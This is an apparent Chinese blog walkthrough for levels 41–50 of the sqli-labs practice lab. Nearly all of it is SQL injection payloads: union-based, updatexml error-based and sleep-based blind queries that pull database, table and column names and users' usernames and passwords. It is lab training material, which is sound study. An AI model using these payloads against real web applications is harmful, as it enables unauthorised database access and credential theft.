sqli-labs靶场通关攻略(41-50)

L黎蕊2024-08-31 10:07

Less-41

1、判断闭合方式

输入?id=1 --+ 必和成功

2、查看回显点

输入?id=-1 union select 1,2,3 --+

得出回显点为2,3

3、查询数据库名

输入?id=-1 union select 1,2,database() --+

4、查询数据库中的表名

输入?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

5、查询users表中的列

输入?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+

6、查询users表中所有字段

输入?id=-1 union select 1,2,group_concat(username,'~',password) from users --+

Less-42

1、使用burp suite进行抓包 并发送至repeater

2、查询数据库名

输入login_user=1'--+&login_password=1'or updatexml(1,concat(1,(select database())),1)--+

3、查询数据库中的表

输入login_user=1'--+&login_password=1'or updatexml(1,concat(1,(select group_concat(table_name)from information_schema.tables where table_schema='security')),1)--+

4、查询users表中的列

输入login_user=1'--+&login_password=1'or updatexml(1,concat(1,(select group_concat(column_name)from information_schema.columns where table_schema='security'and table_name='users')),1)--+

5、查询users表中所有字段

输入login_user=1'--+&login_password=1'or updatexml(1,concat(1,(select group_concat(username,password)from users)),1)--+

Less-43

1、使用burp suite抓包,并发送至repeater

2、查询数据库名

输入login_user=1')--+&login_password=1') or updatexml(1,concat(1,(select database())),1) --+

2、查询数据库中的表名

输入login_user=1')--+&login_password=1') or updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) --+

3、查询users表中的列

输入

login_user=1')--+&login_password=1') or updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) --+

4、查询users表中所有字段

输入login_user=1')--+&login_password=1') or updatexml(1,concat(1,(select group_concat(username,password) from users)),1) --+

Less-44

1、查看页面回显点

2、查询数据库名

1' union select 1,database(),3 #

3、查询数据库中的表

1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #

4、查询users表中的列

1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #

5、查询users表中所有字段

1' union select 1,group_concat(username,password),3 from users #

Less-45

本题除了闭合方式外与44题一样,本题闭合方式为 ' ) ,其余操作可参考44题

Less-46

1、输入?sort=1 页面闭合成功

2、查询数据库名

输入?sort=1 and updatexml(1,concat(1,(select database())),1)

3、查询数据库中的表名

输入?sort=1 and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)

Less-47

1、输入?sort=1' --+ ,页面闭合成功

2、查询数据库名

输入?sort=1' and updatexml(1,concat(1,(select database())),1)--+

3、查询数据库中的表名

输入?sort=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) --+

Less-48

1、输入?sort=1 页面闭合成功

2、查询数据库名

输入?sort=1 and if((ascii(substr(database(),1,1))>114),sleep(3),1)

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面延迟三秒访问 说明数据库第一位字符ascii码大于114

输入?sort=1 and if((ascii(substr(database(),1,1))>115),sleep(3),1)

判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115

对比ascii表得出,第一个字符为's'

在以此类推,得出数据库长度为'security'

3、查询数据库中的表名

输入?sort=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100 ,sleep(3),1)

页面延迟三秒访问

输入?sort=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101 ,sleep(3),1)

页面正常响应

可以得出第一个字符为101,在对比ascii表得出,第一个字符为'e'

以此类推,得出第一个表名为'email'

Less-49

1、输入?sort=1' --+ 页面闭合成功

2、查询数据库名

输入?sort=1' and if((ascii(substr(database(),1,1))>114),sleep(3),1)--+

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面延迟三秒访问 说明数据库第一位字符ascii码大于114

输入?sort=1' and if((ascii(substr(database(),1,1))>115),sleep(3),1)--+

判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115

对比ascii表的得出数据库的第一个字符为's'

再以此类推,得出数据库全名为'security'

3、查询数据库中的表名

输入?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100 ,sleep(3),1)--+

页面延迟三秒访问

输入?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101 ,sleep(3),1)--+

页面正常回显

说明第一个字符的ascii值为101,对比ASCII表,得出第一个表的第一个字符为'e'

在以此类推,得出第一个表名为'email'

Less-50

1、输入?sort=1

2、查询数据库名

输入?sort=1 and updatexml(1,concat(1,(select database())),1)

3、查询数据库中的表

输入?sort=1 and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)

相关推荐
云服务器租用费用13 小时前
2026年腾讯云OpenClaw(Clawdbot)+Skills云上部署及Windows本地集成轻松入门
运维·服务器·数据库·windows·云计算·腾讯云
AllData公司负责人14 小时前
大模型赋能AllData数据中台,系列升级|通过联合智谱大模型与BiSheng开源项目,建设企业大模型应用开发平台,支持知识库向量检索!
大数据·数据结构·数据库·算法·大模型·向量数据库·智谱ai
Raink老师14 小时前
【AI面试临阵磨枪-94】Skill 安全:注入、越权、数据泄露、恶意代码、沙箱?
数据库·安全·面试
程序员二叉14 小时前
【Redis】 缓存三大问题 + 大Key/热Key 全面解析
数据库·redis·缓存
mit6.82414 小时前
Agent Memory Management
数据库·人工智能
We Just Keep growing14 小时前
【MySQL进阶篇】—— 视图、存储过程、存储函数、触发器
数据库·mysql
梦想的颜色15 小时前
MySQL 数据存储结构与查询执行生命周期深度解析
运维·数据结构·数据库·mysql·线程·优化
电商API_1800790524715 小时前
免 TOP 入驻,第三方淘宝商品详情 API 快速接入与代码示例
java·大数据·开发语言·数据库·爬虫·数据分析
神龙斗士24015 小时前
增删改查操作
数据库·mysql
Elastic 中国社区官方博客16 小时前
13.7万人,零人工决策:使用 Elasticsearch 实现智能体驱动的灾害响应系统
大数据·数据库·人工智能·elasticsearch·搜索引擎·ai·全文检索
热门推荐
01GitHub 镜像站点022026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf03【AI】2026 年具身智能模型和世界模型总结04Codex 下载安装指南:Windows 和 macOS 官方版下载05Codex 桌面端更新后 Chrome 插件和 Computer Use 不可用,怎么排查和修复06【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法07CC-Switch 下载、安装与使用配置指南【2026.5.29】08CC-Switch & Claude 基于 Linux 服务器安装使用指南09Codex 接入 DeepSeek API 完整配置文档10裂开!ChatGPT 居然开始要手机号验证,附详细解决方法